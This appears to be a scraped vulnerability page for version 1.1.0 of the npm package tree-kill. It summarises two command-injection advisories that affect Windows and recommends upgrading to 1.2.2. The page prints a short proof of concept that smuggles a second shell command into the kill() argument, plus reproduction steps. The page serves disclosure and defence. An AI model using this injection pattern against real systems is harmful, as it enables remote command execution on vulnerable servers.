Version Details and Security Vulnerabilities

📦

tree-kill

1.1.0

Comparision Betweeen 1.1.0 and 1.0.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

tree-kill

1.1.0

Comparision Betweeen 1.1.0 and 1.0.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 1.1.0 of the package tree-kill.

All Security Vulnerabilities

All the vulnerabilities related to the version 1.1.0 of the package

Summary:

Command Injection in tree-kill

Details:

Versions of tree-kill prior to 1.2.2 are vulnerable to Command Injection. The package fails to sanitize values passed to the kill function. If this value is user-controlled it may allow attackers to run arbitrary commands in the server. The issue only affects Windows systems.

Recommendation

Upgrade to version 1.2.2 or later.

Details about tree-kill@1.1.0

Summary:

Treekill Enables OS Command Injection

Details:

A Code Injection exists in treekill and tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command.

Steps To Reproduce:

Create the following PoC file:

var kill = require('treekill');
kill('3333332 & echo "HACKED" > HACKED.txt & ');

Execute the following commands in terminal:

npm i treekill # Install affected module
dir # Check *HACKED.txt* doesn't exist
node poc.js #  Run the PoC
dir # Now *HACKED.txt* exists :)

The HACKED.txt has been created

Details about tree-kill@1.1.0

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 1.1.0 of the package tree-kill.

All Security Vulnerabilities

All the vulnerabilities related to the version 1.1.0 of the package

Summary:

Command Injection in tree-kill

Details:

Recommendation

Upgrade to version 1.2.2 or later.

Details about tree-kill@1.1.0

Summary:

Treekill Enables OS Command Injection

Details:

A Code Injection exists in treekill and tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command.

Steps To Reproduce:

Create the following PoC file:

var kill = require('treekill');
kill('3333332 & echo "HACKED" > HACKED.txt & ');

Execute the following commands in terminal:

npm i treekill # Install affected module
dir # Check *HACKED.txt* doesn't exist
node poc.js #  Run the PoC
dir # Now *HACKED.txt* exists :)

The HACKED.txt has been created

Details about tree-kill@1.1.0

Version Details and Security Vulnerabilities

tree-kill

Comparision Betweeen 1.1.0 and 1.0.0

Security Vulnerabilities

Version Details and Security Vulnerabilities

tree-kill

Comparision Betweeen 1.1.0 and 1.0.0

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Recommendation

Steps To Reproduce:

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Recommendation

Steps To Reproduce:

Version Details and Security Vulnerabilities

tree-kill

Comparision Betweeen 1.1.0 and 1.0.0

Security Vulnerabilities

Version Details and Security Vulnerabilities

tree-kill

Comparision Betweeen 1.1.0 and 1.0.0

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

tree-kill@1.1.0 GHSA-884p-74jh-xrg2 N/A

Recommendation

tree-kill@1.1.0 GHSA-j7fq-p9q7-5wfv 9.8

Steps To Reproduce:

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

tree-kill@1.1.0 GHSA-884p-74jh-xrg2 N/A

Recommendation

tree-kill@1.1.0 GHSA-j7fq-p9q7-5wfv 9.8

Steps To Reproduce: